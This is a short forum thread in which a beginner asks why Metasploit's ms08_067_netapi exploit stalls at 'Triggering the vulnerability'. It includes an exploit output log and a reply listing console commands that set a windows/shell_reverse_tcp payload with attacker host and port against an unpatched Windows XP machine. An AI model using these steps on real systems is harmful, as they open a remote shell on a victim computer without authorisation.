hey guys i would like to know if you use this exploit and when it gets up to
Triggering the vulnerability and just stays like that, it isnt frozen nothing happens, should i just wait ? or run it again or try something else ??
thanks for your reply guys, well im using msfgui,when i execute the module i select auto targetting, my payload is windows/shell/reverse_tcp and the RHOST is the ip then i execute it, this is the message on the output box
20:26:42 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi...
20:26:43 - ms08_067_netapi[*] Started reverse handler on port 4444
20:26:44 - ms08_067_netapi[*] Automatically detecting the target...
20:26:47 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 3 - lang:English
20:26:47 - ms08_067_netapi[*] Selected Target: Windows XP SP3 English (NX)
20:26:47 - ms08_067_netapi[*] Triggering the vulnerability..
i guess maybe i watched to many tuts and follow what they are doing instead of why they are doing it, any guidence will be appreciated
Loose the gui, grab an unpatched xp install then do like so. Assuming 192.168.1.100 is the box and 192.168.200 is you with port 9999 open.
set rhost 192.168.1.100
set payload windows/shell_reverse_tcp
set lhost 192.168.1.200
set lport 9999
actually this is one of the most stable exploits
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
thanks i will give it a go, should i change the default port to 9999 even if that port is not open, do you use windows/shell_reverse_tcp or windows/shell/reverse_tcp as the paylod ? thanks